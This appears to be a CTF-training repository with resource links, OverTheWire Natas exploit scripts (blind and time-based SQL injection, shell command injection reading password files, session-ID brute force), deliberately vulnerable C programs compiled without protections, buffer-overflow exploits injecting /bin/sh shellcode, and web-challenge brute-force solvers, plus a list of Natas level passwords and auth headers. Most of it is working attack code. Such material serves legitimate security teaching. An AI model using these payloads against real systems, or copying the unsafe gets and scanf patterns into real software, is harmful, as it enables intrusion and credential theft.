├── .gitignore ├── README.md ├── challenges ├── .DS_Store ├── Natas │ ├── Readme.md │ ├── natas15 │ │ └── exploit.py │ ├── natas16 │ │ └── exploit.py │ ├── natas17 │ │ └── exploit.py │ ├── natas18 │ │ └── exploit.py │ └── natas19 │ │ └── exploit.py ├── binary │ ├── .DS_Store │ ├── 01_deadbeef │ │ ├── .DS_Store │ │ ├── Makefile │ │ ├── deadbeef │ │ ├── deadbeef.c │ │ └── exploit.txt │ ├── 02_admin │ │ ├── Makefile │ │ ├── admin │ │ ├── admin.c │ │ └── exploit.txt │ ├── 03_EGG │ │ ├── .gdb_history │ │ ├── Makefile │ │ ├── egg │ │ ├── egg.c │ │ └── exploit │ ├── 04_L0g1n │ │ ├── .DS_Store │ │ ├── .gdb_history │ │ ├── Makefile │ │ ├── README.md │ │ ├── expl2.py │ │ ├── exploit.py │ │ ├── login │ │ └── login.c │ └── 05_N0t_0NLY_L0g1n │ │ ├── .DS_Store │ │ ├── .gdb_history │ │ ├── Makefile │ │ ├── README.md │ │ ├── expl2.py │ │ ├── exploit.py │ │ ├── login │ │ └── login.c └── web │ ├── 00_Canadian_FOI │ └── downloader.py │ ├── 01_Login_1 │ ├── requirements.txt │ ├── server.js │ └── solution.js │ └── 02_Login_3 │ ├── flag.txt │ ├── passwd.txt │ ├── server.py │ └── solution.py └── slides ├── 01_CTF WTF.pdf ├── 02_Binary exploitation 101.pdf ├── 03_Format_String_Attack.pdf ├── 04_WEB_101.pdf └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | # Created by https://www.gitignore.io/api/macos 2 | # Edit at https://www.gitignore.io/?templates=macos 3 | 4 | ### macOS ### 5 | # General 6 | .DS_Store 7 | .AppleDouble 8 | .LSOverride 9 | 10 | # Icon must end with two \r 11 | Icon 12 | 13 | # Thumbnails 14 | ._* 15 | 16 | # Files that might appear in the root of a volume 17 | .DocumentRevisions-V100 18 | .fseventsd 19 | .Spotlight-V100 20 | .TemporaryItems 21 | .Trashes 22 | .VolumeIcon.icns 23 | .com.apple.timemachine.donotpresent 24 | 25 | # Directories potentially created on remote AFP share 26 | .AppleDB 27 | .AppleDesktop 28 | Network Trash Folder 29 | Temporary Items 30 | .apdisk 31 | 32 | # End of 
https://www.gitignore.io/api/macos
33 |
-------------------------------------------------------------------------------- /README.md: --------------------------------------------------------------------------------
1 | # Risorse utili
2 |
3 | ## Wargames
4 | ### I wargames sono delle sfide a livelli, in cui risolvendo un livello si ottiene la password per il livello successivo
5 | - [OverTheWire](https://overthewire.org/wargames/)
6 |
7 | ## Challenges
8 | ### CTF sempre attive
9 | - [Hacker101 CTF](https://ctf.hacker101.com)
10 | - [Cyber Talents](https://cybertalents.com/challenges)
11 |
12 | ## Writeups
13 | - [CTFtime](https://ctftime.org) - Ci sono i writeups delle CTF passate
14 |
15 | ## Tools
16 | - [ASCII to Hex](https://www.asciitohex.com/) - Convertitore tra diverse codifiche
17 | - [RsaCtfTool](https://github.com/Ganapati/RsaCtfTool) - Diversi attacchi automatizzati per RSA
18 | - [RSA-Chinese-Remainder](https://github.com/JulesDT/RSA-Hastad) - Tool per effettuare l'Håstad broadcast attack (stesso messaggio cifrato con e = 3 verso più destinatari)
19 |
20 | ## Risorse per imparare roba
21 | ### Youtube
22 | - [LiveOverflow](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w) - Hacking e CTF in generale
23 | - [Gynvael EN](https://www.youtube.com/user/GynvaelEN) - CTF
24 | - [IppSec](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA) - _Hack the box_ walkthrough
25 | - [Hacker101](https://www.hacker101.com/videos)
26 |
-------------------------------------------------------------------------------- /challenges/.DS_Store: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/RecursionFairies/CTF-training/283adebb837e8764353504b9fbf9a909a5241bd3/challenges/.DS_Store
-------------------------------------------------------------------------------- /challenges/Natas/Readme.md: --------------------------------------------------------------------------------
1 | Passwords of the Natas levels (as recorded when these exploits were written; OverTheWire may have rotated them since, so re-derive them with the scripts rather than trusting this list):
2 |
3 | * **natas5**: 
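`iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq`
4 | * **natas6**: `aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1`
5 | * **natas7**: `7z3hEENjQtflzgnT29q7wAvMNfZdh0i9`
6 | * **natas8**: `DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe`
7 | * **natas9**: `W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl`
8 | * **natas10**: `nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu`
9 | * **natas11**: `U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK`
10 | * **natas12**: `EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3`
11 | * **natas13**: `jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY`
12 | * **natas14**: `Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1`
13 | * **natas15**: `AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J`
14 | * **natas16**: `WaIHEacj63wnNIBROHeqi3p9t0m5nhmh`
15 | * **natas17**: `8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw`
16 | * **natas18**: `xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP`
17 | * **natas19**: `4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs`
18 | * **natas20**: `eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF`
-------------------------------------------------------------------------------- /challenges/Natas/natas15/exploit.py: --------------------------------------------------------------------------------
"""Boolean-based blind SQL injection against OverTheWire natas15.

The level's "user exists?" form answers with either "This user exists."
or "This user doesn't exist." — a one-bit oracle.  The payload closes the
username string and appends a LIKE condition on the password column, so
the page reveals whether the natas16 password starts with a given prefix.
The password is recovered one character at a time.

Runs on Python 3.  The earlier version compared ``res.content`` (bytes)
with a str, which only worked on Python 2; ``res.text`` is used instead.
"""

import requests

# Candidate alphabet: Natas passwords are alphanumeric.
ALL_CHAR = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

URL = "http://natas15.natas.labs.overthewire.org/index.php?debug"

# COLLATE latin1_general_cs makes LIKE case sensitive; with the default
# case-insensitive collation 'a' and 'A' would both match and the recovered
# password would have the wrong case.  The placeholder receives the prefix.
QUERY = 'natas16" and password COLLATE latin1_general_cs like "{}%'

# HTTP Basic credentials of the natas15 level itself (natas15:<password>).
# Copy the Authorization header your browser sends if this one is stale.
HEADER = {
    "Authorization": "Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg=="
}

# Seconds before a single stalled request is abandoned (requests has no default).
TIMEOUT = 10


def prefix_matches(prefix):
    """Return True if the natas16 password starts with ``prefix``.

    Raises ``requests.HTTPError`` on a non-2xx reply: a 401 from stale
    credentials has no "doesn't exist" text either, and without this check
    every candidate would look like a hit and the output would be garbage.
    """
    res = requests.post(
        url=URL,
        data={"username": QUERY.format(prefix)},
        headers=HEADER,
        timeout=TIMEOUT,
    )
    res.raise_for_status()
    # The oracle: the "doesn't exist" message is absent exactly when the
    # LIKE condition matched.
    return "doesn't exist" not in res.text


def recover_password():
    """Grow the known prefix one character at a time until no char extends it."""
    pswd = ""
    while True:
        for char in ALL_CHAR:
            if prefix_matches(pswd + char):
                pswd += char
                print(pswd)
                break
        else:
            # No character extended the prefix: the password is complete.
            return pswd


if __name__ == "__main__":
    print("The password is \n{}".format(recover_password()))
-------------------------------------------------------------------------------- /challenges/Natas/natas16/exploit.py: --------------------------------------------------------------------------------
1 | import requests
2 | import urllib.parse
3 | import base64
4 | import time
5 | from pprint import pprint
6 |
7 | url = "http://natas16.natas.labs.overthewire.org/?needle={}&submit=Search"
8 |
9 | all_char = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
10 |
11 | header = {
12 | "Authorization": "Basic bmF0YXMxNjpXYUlIRWFjajYzd25OSUJST0hlcWkzcDl0MG01bmhtaA=="
13 | }
14 |
15 |
16 | def make_request(qry):
17 | res = requests.get(url=url.format(
18 | urllib.parse.quote_plus(qry)), headers=header)
19 | return res.content
20 |
21 |
22 | resp_dict = {}
23 |
24 | # fill the char dictionary with the query output
25 | for char in all_char:
26 | res = make_request(char)
27 | if res not in resp_dict.keys():
28 | resp_dict[res] = []
29 | resp_dict[res].append(char)
30 |
31 | flag_length = 32 # we know the standard flag length
32 |
33 | solution = []
34 |
35 | for i in range(flag_length):
36 | qry = "$(dd status=none bs=1 skip={} count=1 if=/etc/natas_webpass/natas17)".format(i)
37 | res = make_request(qry)
38 | solution.append(resp_dict[res])
39 |
40 | for i, l in enumerate(solution):
41 | 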
print(i, l) 42 | 43 | 44 | pswd = "" 45 | idx = 18 #position of char A which appears only once 46 | 47 | for el in solution[idx:]: 48 | for pos in el: 49 | tmp = pswd + pos 50 | qry = "$(expr substr $(grep {} /etc/natas_webpass/natas17) 17 3)".format(tmp) 51 | res = make_request(qry) 52 | if "African" not in str(res): 53 | pswd = tmp 54 | print(pswd) 55 | break 56 | 57 | for el in range(idx, -1, -1): 58 | for pos in solution[el]: 59 | tmp = pos + pswd 60 | qry = "$(expr substr $(grep {} /etc/natas_webpass/natas17) 17 3)".format(tmp) 61 | res = make_request(qry) 62 | if "African" not in str(res): 63 | pswd = tmp 64 | print(pswd) 65 | break -------------------------------------------------------------------------------- /challenges/Natas/natas17/exploit.py: -------------------------------------------------------------------------------- 1 | 2 | import requests 3 | import time 4 | 5 | 6 | all_char = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" 7 | 8 | found = False 9 | 10 | # Collate latin1_general_cs is used to make LIKE case sensitive 11 | # SQL injection 12 | query = 'natas18" and password COLLATE latin1_general_cs like "{}%" and sleep(3) and "1" = "1' 13 | 14 | header = { 15 | "Authorization": "Basic bmF0YXMxNzo4UHMzSDBHV2JuNXJkOVM3R21BZGdRTmRraFBrcTljdw==" 16 | } 17 | 18 | 19 | pswd = [] 20 | 21 | 22 | while found is False: 23 | new_char = False 24 | for char in all_char: 25 | # Try all charcters (int, uppercase and lowercase) 26 | tmp = "".join(pswd) + char 27 | 28 | start_time = time.time() 29 | # Make a request with the password injected in the username. 
30 | res = requests.post(url="http://natas17.natas.labs.overthewire.org/index.php?debug", data={ 31 | "username": query.format(tmp) 32 | }, headers=header) 33 | 34 | time_diff = time.time() - start_time 35 | if time_diff >= 1: 36 | # if the substring password matches, then we append the found new char to the result 37 | new_char = True 38 | pswd.append(char) 39 | print("".join(pswd)) 40 | break 41 | # If it has been found a character, then continue. Otherwise it means that the password has finished. 42 | if new_char is True: 43 | found = False 44 | else: 45 | found = True 46 | 47 | print ("The password is \n{}".format("".join(pswd))) 48 | 49 | 50 | 51 | 52 | 53 | -------------------------------------------------------------------------------- /challenges/Natas/natas18/exploit.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | for i in range(640): 4 | header = { 5 | "Authorization": "Basic bmF0YXMxODp4dktJcURqeTRPUHY3d0NSZ0RsbWowcEZzQ3NEamhkUA==", 6 | "Cookie": "PHPSESSID=" + str(i) 7 | } 8 | 9 | res = requests.get( 10 | url="http://natas18.natas.labs.overthewire.org", headers=header) 11 | 12 | if "You are an admin" in str(res.content): 13 | start = str(res.content).index("Password: ") + 10 14 | password = str(res.content)[start:start+32] 15 | print("Password is: ", password) 16 | exit(0) 17 | -------------------------------------------------------------------------------- /challenges/Natas/natas19/exploit.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | for i in range(10): 4 | passwd0 = "3" + str(i) 5 | for j in range(10): 6 | passwd1 = passwd0 + "3" + str(j) 7 | for k in range(10): 8 | passwd = passwd1 + "3" + str(k) 9 | 10 | header = { 11 | "Authorization": "Basic bmF0YXMxOTo0SXdJcmVrY3VabEE5T3NqT2tvVXR3VTZsaG9rQ1BZcw==", 12 | "Cookie": "PHPSESSID=" + passwd + "2d61646d696e" 13 | } 14 | 15 | res = requests.get( 16 | 
url="http://natas19.natas.labs.overthewire.org", headers=header) 17 | 18 | if "You are an admin" in str(res.content): 19 | start = str(res.content).index("Password: ") + 10 20 | password = str(res.content)[start:start+32] 21 | print("Password is: ", password) 22 | exit(0) 23 | -------------------------------------------------------------------------------- /challenges/binary/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RecursionFairies/CTF-training/283adebb837e8764353504b9fbf9a909a5241bd3/challenges/binary/.DS_Store -------------------------------------------------------------------------------- /challenges/binary/01_deadbeef/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RecursionFairies/CTF-training/283adebb837e8764353504b9fbf9a909a5241bd3/challenges/binary/01_deadbeef/.DS_Store -------------------------------------------------------------------------------- /challenges/binary/01_deadbeef/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc deadbeef.c -o deadbeef -fno-stack-protector -z execstack -no-pie -m32 -g -fno-omit-frame-pointer 3 | -------------------------------------------------------------------------------- /challenges/binary/01_deadbeef/deadbeef: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RecursionFairies/CTF-training/283adebb837e8764353504b9fbf9a909a5241bd3/challenges/binary/01_deadbeef/deadbeef -------------------------------------------------------------------------------- /challenges/binary/01_deadbeef/deadbeef.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(){ 5 | long val=0x41414141; 6 | char buf[20]; 7 | 8 | printf("Give me your name, please: "); 9 | scanf("%24s",&buf); //Ouch! 
10 | 11 | printf("buf: %s\n",buf); 12 | printf("val: 0x%08x\n",val); 13 | 14 | if(val==0xdeadbeef){ 15 | printf("Well done\n"); 16 | exit(0); 17 | } 18 | else { 19 | printf("No way man!\n"); 20 | exit(1); 21 | } 22 | 23 | return 0; 24 | } 25 | -------------------------------------------------------------------------------- /challenges/binary/01_deadbeef/exploit.txt: -------------------------------------------------------------------------------- 1 | python -c 'print "B"*20 + "\xef\xbe\xad\xde"' | ./deadbeef 2 | -------------------------------------------------------------------------------- /challenges/binary/02_admin/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc admin.c -o admin -fno-stack-protector -z execstack -no-pie -m32 -g -fno-omit-frame-pointer 3 | -------------------------------------------------------------------------------- /challenges/binary/02_admin/admin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RecursionFairies/CTF-training/283adebb837e8764353504b9fbf9a909a5241bd3/challenges/binary/02_admin/admin -------------------------------------------------------------------------------- /challenges/binary/02_admin/admin.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(int argc, char const *argv[]) 4 | { 5 | int auth_code = 0; 6 | char username[16] = {0}; 7 | 8 | printf("Enter your username: "); 9 | fflush(stdout); 10 | scanf("%20s", username); /* Ouch! */ 11 | 12 | if (auth_code == 0x1337) 13 | { 14 | printf("Welcome back, admin!\n"); 15 | /* ... 
*/ 16 | } 17 | else 18 | { 19 | printf("Welcome back, %s!\n", username); 20 | } 21 | return 0; 22 | } 23 | -------------------------------------------------------------------------------- /challenges/binary/02_admin/exploit.txt: -------------------------------------------------------------------------------- 1 | python -c 'print "A"*16+"\x37\x13"' | ./admin -------------------------------------------------------------------------------- /challenges/binary/03_EGG/.gdb_history: -------------------------------------------------------------------------------- 1 | disass main 2 | pd main 3 | help 4 | peda help 5 | disass main 6 | pd main 7 | pattern_create 8 | pattern_create 100 9 | pattern_create 100 10 | pattern_create 100 11 | pattern_offset 12 | pattern_offset 0x41416741 13 | -------------------------------------------------------------------------------- /challenges/binary/03_EGG/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc egg.c -o egg -fno-stack-protector -z execstack -no-pie -m32 -g -fno-omit-frame-pointer 3 | -------------------------------------------------------------------------------- /challenges/binary/03_EGG/egg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RecursionFairies/CTF-training/283adebb837e8764353504b9fbf9a909a5241bd3/challenges/binary/03_EGG/egg -------------------------------------------------------------------------------- /challenges/binary/03_EGG/egg.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(){ 4 | int (*ret)(); 5 | 6 | if(getenv("EGG")==NULL){ 7 | printf("Give me something to execute at the env-variable EGG\n"); 8 | exit(1); 9 | } 10 | 11 | printf("Trying to execute EGG!\n"); 12 | ret = getenv("EGG"); 13 | ret(); 14 | 15 | return 0; 16 | } -------------------------------------------------------------------------------- 
/challenges/binary/03_EGG/exploit: -------------------------------------------------------------------------------- 1 | shellcode http://shell-storm.org/shellcode/files/shellcode-811.php 2 | 3 | export EGG=$'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80' -------------------------------------------------------------------------------- /challenges/binary/04_L0g1n/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RecursionFairies/CTF-training/283adebb837e8764353504b9fbf9a909a5241bd3/challenges/binary/04_L0g1n/.DS_Store -------------------------------------------------------------------------------- /challenges/binary/04_L0g1n/.gdb_history: -------------------------------------------------------------------------------- 1 | pd admin_menu 2 | pattern_create 100 3 | r 4 | pattern_offset 0x48414132 5 | r 6 | r 7 | r 8 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 9 | r 10 | -------------------------------------------------------------------------------- /challenges/binary/04_L0g1n/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc login.c -o login -fno-stack-protector -z execstack -no-pie -m32 -g -fno-omit-frame-pointer 3 | -------------------------------------------------------------------------------- /challenges/binary/04_L0g1n/README.md: -------------------------------------------------------------------------------- 1 | # 04\_L0g1n 2 | Someone told me he was able to became admin, was he joking right? 3 | 4 | To pass this challenge call the `admin_menu()` function. 
-------------------------------------------------------------------------------- /challenges/binary/04_L0g1n/expl2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2 2 | # -*- coding: utf-8 -*- 3 | 4 | from pwn import * 5 | context(arch='i386') 6 | rem = False 7 | if rem: 8 | io = remote('10.0.10.1', 31337) 9 | else: 10 | io = process('./login') 11 | 12 | admin_menu_addr = 0x08048581 13 | 14 | io.recvline() 15 | 16 | #io.sendline('A'*60 + "\x81\x85\x04\x08") 17 | io.sendline('A'*60 + p32(admin_menu_addr)) 18 | 19 | 20 | 21 | 22 | 23 | 24 | io.interactive() 25 | 26 | ''' 27 | 28 | s = io.recvuntil("") 29 | 30 | 31 | s = io.recvline() 32 | 33 | io.sendline(fit({32: p32(canary), 48: p32(0x08048a8c)})) #buffer overflow! 34 | 35 | io.interactive()''' -------------------------------------------------------------------------------- /challenges/binary/04_L0g1n/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | # -*- coding: utf-8 -*- 3 | 4 | from pwn import * 5 | context(arch='i386', os='linux') 6 | 7 | #io = remote('10.0.10.1', 31337) 8 | io = process('./login') 9 | 10 | admin_menu_addr = 0x08048581 #pd admin_menu 11 | 12 | 13 | #pattern_create 100 14 | # run in gdb with pattern as input 15 | #pattern_offset 0x48414132 16 | 17 | io.send('A'*60 + p32(admin_menu_addr)+"\n") 18 | 19 | io.interactive() 20 | -------------------------------------------------------------------------------- /challenges/binary/04_L0g1n/login: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RecursionFairies/CTF-training/283adebb837e8764353504b9fbf9a909a5241bd3/challenges/binary/04_L0g1n/login -------------------------------------------------------------------------------- /challenges/binary/04_L0g1n/login.c: -------------------------------------------------------------------------------- 1 | #include 2 | 
#include 3 | 4 | int login() 5 | { 6 | char password[48] = {0}; 7 | printf("(password starts at address: %p)\n", password); 8 | 9 | printf("Please enter the admin password: "); 10 | fflush(stdout); 11 | 12 | gets(password); 13 | return 0; /* TODO implement proper authorization */ 14 | } 15 | 16 | void admin_menu() 17 | { 18 | printf("Welcome back, admin!\n"); 19 | /* ... */ 20 | exit(0); 21 | } 22 | 23 | int main(int argc, char const *argv[]) 24 | { 25 | int authorized = login(); 26 | if (authorized) 27 | { 28 | admin_menu(); 29 | } 30 | else 31 | { 32 | printf("Not authorized!\n"); 33 | } 34 | return 0; 35 | } 36 | -------------------------------------------------------------------------------- /challenges/binary/05_N0t_0NLY_L0g1n/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RecursionFairies/CTF-training/283adebb837e8764353504b9fbf9a909a5241bd3/challenges/binary/05_N0t_0NLY_L0g1n/.DS_Store -------------------------------------------------------------------------------- /challenges/binary/05_N0t_0NLY_L0g1n/.gdb_history: -------------------------------------------------------------------------------- 1 | pd admin_menu 2 | pattern_create 100 3 | r 4 | pattern_offset 0x48414132 5 | r 6 | r 7 | r 8 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 9 | r 10 | -------------------------------------------------------------------------------- /challenges/binary/05_N0t_0NLY_L0g1n/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc login.c -o login -fno-stack-protector -z execstack -no-pie -m32 -g -fno-omit-frame-pointer 3 | -------------------------------------------------------------------------------- /challenges/binary/05_N0t_0NLY_L0g1n/README.md: -------------------------------------------------------------------------------- 1 | # 05\_N0t\_0NLY\_L0g1n 2 | Incredibly another friend of mine was able to spawn a sh3ll. 
Is he an h4ck3r or am I a n00b? 3 | 4 | To pass this challenge spawn a shell. (**Hint**: *shellcode*, *pwntools*) -------------------------------------------------------------------------------- /challenges/binary/05_N0t_0NLY_L0g1n/expl2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2 2 | # -*- coding: utf-8 -*- 3 | 4 | from pwn import * 5 | context(arch='i386') 6 | rem = False 7 | if rem: 8 | io = remote('10.0.10.1', 31337) 9 | else: 10 | io = process('./login') 11 | 12 | shellcode = '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80' 13 | 14 | password_addr = int(io.recvline()[-12:-2],16) 15 | 16 | 17 | io.sendline(shellcode + 'A'*(60-len(shellcode)) + p32(password_addr)) 18 | 19 | 20 | 21 | 22 | 23 | 24 | io.interactive() 25 | 26 | ''' 27 | 28 | s = io.recvuntil("") 29 | 30 | 31 | s = io.recvline() 32 | 33 | io.sendline(fit({32: p32(canary), 48: p32(0x08048a8c)})) #buffer overflow! 
34 | 35 | io.interactive()''' -------------------------------------------------------------------------------- /challenges/binary/05_N0t_0NLY_L0g1n/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | # -*- coding: utf-8 -*- 3 | 4 | from pwn import * 5 | import struct 6 | context(arch='i386', os='linux') 7 | 8 | #io = remote('10.0.10.1', 31337) 9 | io = process('./login') 10 | 11 | psw_addr = int(io.recvuntil(")")[-11:-1], 16) 12 | #print hex(psw_addr) 13 | 14 | # pattern_create 100 15 | # run in gdb with pattern as input 16 | #pattern_offset 0x48414132 17 | 18 | shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" 19 | print len(shellcode + 'A'*(60-len(shellcode)) + p32(psw_addr)) # we want it ==64 20 | io.send(shellcode + 'A'*(60-len(shellcode)) + p32(psw_addr)+"\n") 21 | 22 | io.interactive() 23 | -------------------------------------------------------------------------------- /challenges/binary/05_N0t_0NLY_L0g1n/login: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RecursionFairies/CTF-training/283adebb837e8764353504b9fbf9a909a5241bd3/challenges/binary/05_N0t_0NLY_L0g1n/login -------------------------------------------------------------------------------- /challenges/binary/05_N0t_0NLY_L0g1n/login.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int login() 5 | { 6 | char password[48] = {0}; 7 | printf("(password starts at address: %p)\n", password); 8 | 9 | printf("Please enter the admin password: "); 10 | fflush(stdout); 11 | 12 | gets(password); 13 | return 0; /* TODO implement proper authorization */ 14 | } 15 | 16 | void admin_menu() 17 | { 18 | printf("Welcome back, admin!\n"); 19 | /* ... 
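*/
20 | exit(0);
21 | }
22 |
23 | int main(int argc, char const *argv[])
24 | {
25 | int authorized = login();
26 | if (authorized)
27 | {
28 | admin_menu();
29 | }
30 | else
31 | {
32 | printf("Not authorized!\n");
33 | }
34 | return 0;
35 | }
36 |
-------------------------------------------------------------------------------- /challenges/web/00_Canadian_FOI/downloader.py: --------------------------------------------------------------------------------
"""Enumerate and download every document of the Canadian FOI challenge.

Documents are served under a predictable name, ``document_NNN.pdf`` with a
zero-padded three-digit NNN, so the whole 000..999 space can be walked.
"""
import os

import requests
from tqdm import tqdm

BASE_URL = "http://foi.uni.hctf.fun/docs/document_"
OUT_DIR = "./files"
TIMEOUT = 10  # seconds; without it one stalled request hangs the whole scan

# open() does not create parent directories; make sure the target exists.
os.makedirs(OUT_DIR, exist_ok=True)

# range(1000), not range(0, 999): the old upper bound silently skipped
# document_999, the last name in the three-digit space.
for number in tqdm(range(1000)):
    pdf_number = str(number).zfill(3)
    url = BASE_URL + pdf_number + ".pdf"
    r = requests.get(url, stream=True, timeout=TIMEOUT)

    if r.status_code != 200:
        continue

    with open(os.path.join(OUT_DIR, "file_" + pdf_number + ".pdf"), "wb") as fd:
        # Explicit chunk size; iterating the response directly uses a
        # 128-byte default, which is needlessly slow for PDFs.
        for chunk in r.iter_content(chunk_size=8192):
            fd.write(chunk)
-------------------------------------------------------------------------------- /challenges/web/01_Login_1/requirements.txt: --------------------------------------------------------------------------------
1 | http
2 | crypto
3 | url
4 | fs
5 |
-------------------------------------------------------------------------------- /challenges/web/01_Login_1/server.js: --------------------------------------------------------------------------------
1 | var http = require('http');
2 | const crypto = require('crypto');
3 | var url = require('url');
4 | var fs = require('fs');
5 |
6 | var _0x86d1=["\x68\x65\x78","\x72\x61\x6E\x64\x6F\x6D\x42\x79\x74\x65\x73"];
7 |
8 | function generatePart1() {
9 | return
10 | {
11 | x: crypto[_0x86d1[1]](8)
12 |
13 | }[x].toString(_0x86d1[0]);
14 | }
15 | function generatePart2() {
16 | return [+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]];
17 | }
18 |
19 | http.createServer(function (req, res) {
20 | res.writeHead(200, {'Content-Type': 'text/html'});
21 | passwd = generatePart1() + generatePart2();
22 | var url_content = 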
url.parse(req.url, true); 23 | 24 | if (passwd == url_content.query.passwd) { 25 | res.write(fs.readFileSync('flag.txt', 'utf8')); 26 | } else { 27 | res.write('
'); 28 | } 29 | res.end(); 30 | }).listen(8888); 31 | -------------------------------------------------------------------------------- /challenges/web/01_Login_1/solution.js: -------------------------------------------------------------------------------- 1 | var request = require("request"); 2 | const crypto = require('crypto'); 3 | 4 | var _0x86d1=["\x68\x65\x78","\x72\x61\x6E\x64\x6F\x6D\x42\x79\x74\x65\x73"]; 5 | 6 | function generatePart1() { 7 | return 8 | { 9 | x: crypto[_0x86d1[1]](8) 10 | 11 | }[x].toString(_0x86d1[0]); 12 | } 13 | function generatePart2() { 14 | return [+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]; 15 | } 16 | 17 | passwd = generatePart1() + generatePart2(); 18 | 19 | var baseurl = "http://login1.uni.hctf.fun/?passwd="; 20 | request(baseurl + passwd, function(error, response, result) { 21 | console.log(result); 22 | }); 23 | -------------------------------------------------------------------------------- /challenges/web/02_Login_3/flag.txt: -------------------------------------------------------------------------------- 1 | 4_d4mn_l0ng_fl4g} 2 | -------------------------------------------------------------------------------- /challenges/web/02_Login_3/passwd.txt: -------------------------------------------------------------------------------- 1 | 007 2 | -------------------------------------------------------------------------------- /challenges/web/02_Login_3/server.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, request, send_from_directory 2 | 3 | app = Flask(__name__) 4 | 5 | passwd = open("./passwd.txt").read().split("\n")[0] 6 | flag = open("./flag.txt").read() 7 | 8 | 9 | @app.route('/') 10 | def index(): 11 | userpw = request.args.get("passwd", "") 12 | if userpw == passwd: 13 | return flag, 200, {"Content-Type": "text/plain"} 14 | else: 15 | return '
' 16 | 17 | 18 | if __name__ == '__main__': 19 | assert(len(passwd) == 3) 20 | assert(passwd.isdigit()) 21 | app.run() 22 | -------------------------------------------------------------------------------- /challenges/web/02_Login_3/solution.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import urllib2 3 | 4 | baseurl = "http://login3.uni.hctf.fun/?passwd=" 5 | for number in range(0, 999): 6 | pwd = "0"*(3-len(str(number))) + str(number) 7 | content = urllib2.urlopen(baseurl + pwd).read() 8 | if content.find("